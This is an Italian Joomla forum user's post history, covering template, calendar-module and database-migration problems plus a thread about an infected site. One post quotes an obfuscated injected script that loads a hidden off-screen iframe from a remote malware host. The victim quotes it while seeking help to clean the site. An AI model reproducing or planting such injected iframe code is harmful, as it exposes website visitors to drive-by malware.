Back to top

Visualizza post

Questa sezione ti permette di visualizzare tutti i post inviati da questo utente. N.B: puoi vedere solo i post relativi alle aree dove hai l'accesso.


Post - VindeX_AriocH

Pagine: [1]
1
Sicurezza / Re:virus trovato, come curarlo?
« il: 21 Set 2012, 15:35:02 »
usi jce come editor o cmq ce l'hai?

M.
no non lo conosco e non penso di averlo

2
Sicurezza / Re:virus trovato, come curarlo?
« il: 21 Set 2012, 15:10:04 »
beh purtroppo l'av mi ha trovato solo un file e l'ho rimosso ma questo nn ha avuto effetto perchè evidentemente il codice del primo post è generato da qualcos'altro, non sono 7000 file perchè sull'homepage ne lavorano molti di meno, di che strumenti parli comunque?

3
Sicurezza / Re:virus trovato, come curarlo?
« il: 21 Set 2012, 12:19:28 »
grazie della risposta,
comunque avevo già letto il tuo post ed il file l'ho trovato, il discorso è che è joomla 1.5.22 e ricomporlo da capo è veramente un lavorone pazzesco, per quello ho chiesto, non c'è un modo di trovare la causa piuttosto che rimettere tutto nuovo senza trovarlo?
EDIT: il file infetto che ho trovato è in /components/ e si chiama capcha.php

4
Sicurezza / virus trovato, come curarlo?
« il: 21 Set 2012, 10:21:34 »
Ciao a tutti!

Usando linux non me ne sono accorto ma alcuni utenti di un sito (www.informaviano.it) che ho creato con joomla 1.5 mi hanno segnalato che il loro antivirus dice che c'è un virus.
Io effettivamente facendo una breve ricerca sul sorgente della home ricavato con linux (perchè con windows il sito non si apre) ho trovato queste righe all'inizio

Codice: [Seleziona]
<script>
var _q = document.createElement('iframe'),
    _n = 'setAttribute';
_q[_n]('src', 'http://twitter.dnsjiexi.tk:1342/t/a219bf65b03b586005c6a8e76660286a');
_q.style.position = 'absolute';
_q.style.width = '10px';
_q[_n]('frameborder', navigator.userAgent.indexOf('2491bc9c7d8731e1ae33124093bc7026') + 1);
_q.style.left = '-6247px';
document.write('<div id=\'Twitter\'></div>');
document.getElementById('Twitter').appendChild(_q);
</script>

e andando sull'url di questo script effettivamente mi viene segnalato un virus, quindi mi viene da dire BECCATO!  :D
Adesso però come faccio a capire da dove viene? cioè quale componente o che altro mi genera quello script? qualcuno ne sa di più?

Grazie :D

5
Tieni presente che ci possono essere diverse cartelle images...!!
Come minimo...una di joomla e una del template...
Controlla tutte le cartelle e verifica in quale di queste si trova l'immagine della discussione...
Ciao
si si lo so però guardando i file che ci sono dentro è proprio la cartella /images..In ogni caso ho risolto andando a modificare il css, ovviamente adesso se voglio cambiarlo dovrò farlo via codice e non via pannello di controllo ma non è un grosso problema :)
devo dire, guardado il css, che è un template fatto veramente benissimo, mai visto uno simile, se la gioca agevolmente con quelli a pagamento, appena finisco di lavorarci manderò una donazione ai creatori per l'ottimo lavoro fatto :)

6
Una domanda:
- l'immagine risulta nella cartella images del template.?
- Nel file css, in background-image è corretto tutto il percorso ?
ciao! grazie per la risposta ;)
allora la posizione nel css è corretta, per la prima risposta no, è nella cartella /images ma è proprio il template che me la fa mettere lì perchè ha un pannello di controllo tutto suo che mi apre in una finestra la cartella /images per la scelta..

7
Ciao a tutti ragazzi :)

Ho un problema col template Multipastell (http://www.joomla.it/anteprima-template-16/5354-multipastell.html) con l'immagine di sfondo, nel pannello di controllo qualsiasi immagine che io inserisca non me la carica. Guardando sulla pagina caricata il codice l'url dell'immagine è presente ma non viene caricata mentre se lo sostituisco con un immagine a caso presa da internet viene caricata (tutto usando Firebug).
Qualcuno ha avuto esperienze con questo template o ha qualche idea per risolvere il problema?

Grazie mille ;)

8
Joomla! 1.5 / problemaq con GCalendar
« il: 04 Giu 2012, 23:21:51 »
ciao a tutti,
ho un problema strano con GCalendar, tutto mi funziona perfettamente per quanto riguarda il componente ma il modulo non vuole proprio andare, mi viene data continuamente l'immagine del caricamento e non resta lì all'infinito, qualcuno conosce il problema?
soluzioni?

grazie mille ;)

9
Ciao
Molto probabilmente non hai rinnovato il database.
ciao, scusami ma cosa intendi con "rinnovato il database"?
grazie

10
giorno a tutti!
ho appena finito di trasferire il sito da locale a remoto, cambiato il configuration.php e importato il database sul server (aruba), adesso appena apro la pagina remota mi viene riscontrato il seguente errore:

Codice: [Seleziona]
jtablesession::Store Failed
DB function failed with error number 1054
Unknown column 'gid' in 'field list' SQL=INSERT INTO `jos_session` ( `session_id`,`time`,`username`,`gid`,`guest`,`client_id` ) VALUES ( '6dc55c0e8c5d9e9ff7ff28672c92b128','1316424271','','0','1','0' )
 Fatal error:  Allowed memory size of 67108864 bytes exhausted (tried to allocate 35 bytes) in /web/htdocs/www.ncservice.it/home/libraries/joomla/error/exception.php on line 117

potete darmi una mano? come posso risolvere il problema? ho cercato in rete ma non ho trovato grandi soluzioni

premetto anche che il sito in locale continua a funzionare cm ha sempre fatto

grazie!

11
ciao!
mi sono appena registrato per aggiungermi al problema ma ho appena risolto guardando la tua immagine :D
ho notato che tutti e due utilizziamo firefox 4 con l'estensione firebug, allora ho provato a fare lo stesso procedimento per gli articoli su internet explorer e funziona!
purtroppo con firefox, anche disabilitando firebug, il problema persiste e penso sia dovuto a qualche impostazione sugli javascript, adesso ci lavoro un pò e se scopro qualcosa di nuovo ti faccio sapere ;)
intanto se c'è qualcuno che può aiutarci a risolvere l'arcano è il benvenuto :) :) :)

Pagine: [1]


Web Design Bolzano Kreatif